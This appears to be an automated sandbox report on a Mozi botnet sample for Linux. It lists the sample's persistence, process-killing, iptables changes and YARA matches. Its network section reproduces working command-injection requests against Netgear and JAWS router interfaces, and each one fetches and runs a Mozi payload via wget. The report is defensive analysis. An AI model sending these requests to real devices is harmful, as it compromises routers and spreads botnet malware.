4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: dht.transmissionbt.com

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.113.149.148:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 122.201.116.141:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 201.49.41.72:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 216.180.103.7:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Spam, unwanted Advertisements and Ransom Demands:

Writes HTML files containing JavaScript to disk

Source: /tmp/bin.sh (PID: 6792)

HTML file containing JavaScript created: /usr/networks

Jump to dropped file

System Summary:

Yara signature match

Source: bin.sh, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Classification label

Source: classification engine

Classification label: mal100.spre.troj.evad.linSH@0/221@4/0

Persistence and Installation Behavior:

Sample tries to persist itself using System V runlevels

Source: /tmp/bin.sh (PID: 6792)	File: /etc/rcS.d/S95baby.sh			Jump to behavior
Source: /tmp/bin.sh (PID: 6792)	File: /etc/rc.local			Jump to behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/bin.sh (PID: 6792)	File: /etc/profile.d/cedilla-portuguese.sh			Jump to behavior
Source: /tmp/bin.sh (PID: 6792)	File: /etc/profile.d/apps-bin-path.sh			Jump to behavior
Source: /tmp/bin.sh (PID: 6792)	File: /etc/profile.d/Z97-byobu.sh			Jump to behavior
Source: /tmp/bin.sh (PID: 6792)	File: /etc/profile.d/bash_completion.sh			Jump to behavior
Source: /tmp/bin.sh (PID: 6792)	File: /etc/profile.d/vte-2.91.sh			Jump to behavior

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 6827)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6857)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6863)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6897)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6913)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6935)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6948)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6973)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6992)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 6995)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 6998)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7010)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7067)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7093)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7122)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7145)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7163)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7179)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7200)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7216)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7230)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7248)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7261)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7290)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7316)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7319)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7327)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7351)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7378)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7405)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7426)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7439)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT			Jump to behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/bin.sh (PID: 6792)

File: /proc/6792/mounts

Jump to behavior

Terminates several processes with shell command 'killall'

Source: /bin/sh (PID: 6797)

Killall command executed: killall -9 telnetd utelnetd scfgmgr

Jump to behavior

Writes ELF files to disk

Source: /tmp/bin.sh (PID: 6792)

File written: /usr/networks

Jump to dropped file

Writes shell script files to disk

Source: /tmp/bin.sh (PID: 6792)	Shell script file created: /etc/rcS.d/S95baby.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	Shell script file created: /etc/init.d/S95baby.sh			Jump to dropped file

Reads system information from the proc file system

Source: /tmp/bin.sh (PID: 6819)

Reads from proc file: /proc/stat

Jump to behavior

Enumerates processes within the "proc" file system

Source: /usr/bin/killall (PID: 6797)	File opened: /proc/230/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/231/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/232/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/233/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/234/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3512/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/359/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/1452/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3632/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3518/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/10/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/1339/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/11/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/12/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/13/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/14/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/15/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/16/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/17/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/18/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/19/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/483/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3527/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3527/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/1/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/2/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3525/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/1346/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3524/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3524/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/4/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3523/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/5/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/7/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/8/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/9/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/20/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/21/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/22/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/23/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/24/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/25/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/28/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/29/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/1363/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3541/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3541/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/1362/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/496/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/496/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/30/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/31/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/31/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/1119/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3310/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3431/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3431/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/263/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/264/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/385/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/144/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/386/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/145/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/146/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3546/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3546/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/147/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3303/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3545/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/148/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/149/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3543/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/822/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/822/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3308/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3308/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3429/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3429/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/6395/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/47/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/48/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/48/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/49/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/150/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/271/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/151/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/152/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/153/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/395/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/154/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/396/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/155/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/156/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/157/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/158/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/159/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3432/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3432/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/50/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/51/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/3678/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/52/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/53/stat			Jump to behavior
Source: /usr/bin/killall (PID: 6797)	File opened: /proc/54/stat			Jump to behavior

Executes the "iptables" command used for managing IP filtering and manipulation

Source: /bin/sh (PID: 6827)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6857)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6863)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6897)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6913)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6935)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6948)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6973)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6992)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 6995)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 6998)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7010)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7067)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7093)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7122)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7145)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7163)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7179)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7200)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7216)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7230)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7248)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7261)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7290)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7316)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7319)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7327)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7351)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7378)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7405)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7426)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7439)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT			Jump to behavior

Sample tries to set the executable flag

Source: /tmp/bin.sh (PID: 6792)	File: /usr/networks (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /tmp/bin.sh (PID: 6792)	File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)			Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/bin.sh (PID: 6794)	Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"			Jump to behavior
Source: /tmp/bin.sh (PID: 6825)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 6855)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 6858)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 6893)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 6904)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 47453 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 6932)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 6940)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 6967)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 6990)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 6993)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 6996)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7002)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"			Jump to behavior
